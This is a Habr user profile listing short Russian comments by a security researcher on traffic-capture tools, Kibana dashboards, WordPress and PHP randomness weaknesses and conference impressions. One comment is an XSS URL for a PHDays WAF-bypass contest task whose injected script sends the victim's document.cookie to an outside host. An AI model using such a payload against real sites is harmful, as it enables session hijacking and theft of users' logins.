Обновить
39
0
Raz0r @Raz0r

Пользователь

Отправить сообщение
Сейчас используем libnids + libpcap, также есть работающая версия на netmap, но ее нужно развивать.
Нет, будем писать свою кибану.
Мы сделали это с помощью angular-ui-codemirror.
В сторонних плагинах для комментирования, например Disqus или Cackle, уязвимость отсутствует, так как форматирование HTML не производится вордпрессом.
Этот пост про конкретную уязвимость, наверно она и имелась в виду.
Да, с kibana можно делать отличные дашборды, мы разрабатываем еще более удобный форк.
http://task6.waf-bypass.phdays.com/sanitize.php?test=%3Ca+href=%22http://waf-bypass.phdays.com/%23bot%22%3Ehttp://waf-bypass.phdays.com/%23bot%3C/a%3E&name=%3Cscript%3Edocument.location.href=%27http://webmalware.lvk.cs.msu.su?%27%2bdocument.cookie%3C/script%3E
Кстати, после прошлого PyCon образовалась как минимум одна семейная пара: девушка-организатор вышла замуж за докладчика.

Это вы про Армина Ронахера, создателя Flask?
Вопрос: этот японский вектор кто-нибудь знал кроме самих японцев до того, как появился XXE OOB?
После прочтения ощущение, как будто на дворе начало нулевых.
Было очень атмосферно и душевно, очень понравилось отношение к спикерам. Но самое клевое — это идея проведения на открытом воздухе, организаторам зачет!
Ну теперь заживем!
надо было на NASM'е
Что rand, что mt_rand — обе функции небезопасны и дело даже не в них, а в том, что в PHP сид задается одинаково, причем одинаково плохо и предсказуемо. Общались по этому поводу с разработчиками PHP, однако ничего менять они не собираются, согласились лишь добавить плашку в документации, хотя и той не видно.
Нет, так же работает.
Забыли главную особенность регулярок в Руби: homakov.blogspot.com/2012/05/saferweb-injects-in-various-ruby.html

Информация

В рейтинге
Не участвует
Откуда
Москва, Москва и Московская обл., Россия
Работает в
Зарегистрирован
Активность